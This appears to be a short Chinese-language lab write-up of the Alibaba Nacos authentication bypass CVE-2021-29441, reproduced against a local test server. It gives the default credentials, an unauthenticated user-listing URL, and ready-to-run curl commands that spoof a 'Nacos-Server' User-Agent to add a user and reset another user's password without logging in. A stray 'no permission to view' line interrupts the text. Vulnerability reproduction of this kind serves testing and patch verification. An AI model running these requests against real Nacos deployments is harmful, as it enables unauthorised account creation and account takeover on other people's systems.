(CVE-2021-29441)(Nacos添加修改用户)
Alibaba Nacos权限认证绕过漏洞(CVE-2021-29441)
在浏览访问http://192.168.85.160:8848/nacos,搭建成功 //默认账号密码为:nacos/nacos
在没有登陆情况下浏览器访问如下接口,获取用户列表:http://192.168.85.160:8848/nacos/v1/auth/users?pageNo=1&pageSize=1;可以看到用一个用户nacos
利用用户漏洞:http://192.168.85.160:8848/nacos/v1/auth/users;导致:所需的int参数’pageNo’不存在;
您没有 权限 查看此处内容!
Nacos未授权添加修改用户
添加用户:curl -X POST ‘http://192.168.85.130:8848/nacos/v1/auth/users?username=test2&password=test2‘ -H ‘User-Agent:Nacos-Server’
修改用户:curl -X PUT ‘http://192.168.85.130:8848/nacos/v1/auth/users?accessToken=‘ -H ‘User-Agent:Nacos-Server’ -d ‘username=test2&newPassword=test4’
